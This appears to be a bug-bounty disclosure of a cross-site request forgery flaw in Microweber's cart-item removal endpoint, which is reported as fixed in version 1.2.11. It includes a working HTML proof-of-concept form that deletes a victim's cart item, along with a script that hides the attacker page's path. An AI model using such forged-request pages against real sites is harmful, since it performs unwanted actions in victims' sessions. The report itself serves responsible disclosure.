Cross-Site Request Forgery (CSRF) in microweber/microweber
Oct 26th 2021
There is a CSRF vulnerability in the user-side Delete Cart Item action: the `api/remove_cart_item` endpoint accepts a plain POST carrying only the cart item `id`, with no anti-CSRF token, so a form on an attacker-controlled page can trigger it with the victim's session cookie.
When the forged request is submitted I get the error message "Item not removed from cart", but the item has already been deleted (the message is incorrect; the delete action is carried out).
Proof of Concept
<html>
  <body>
    <!-- Hide the attacker page's real path from the address bar -->
    <script>history.pushState('', '', '/')</script>
    <!-- Cross-site POST to the vulnerable endpoint; the victim's session cookie is attached automatically -->
    <form action="https://demo.microweber.org/demo/api/remove_cart_item" method="POST">
      <input type="hidden" name="id" value="125" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
After the victim clicks the submit button, the cart item with id 125 is deleted from their cart.
Peter Ivanov validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov marked this as fixed in 1.2.11 with commit 2fa9a6 a year ago
This vulnerability will not receive a CVE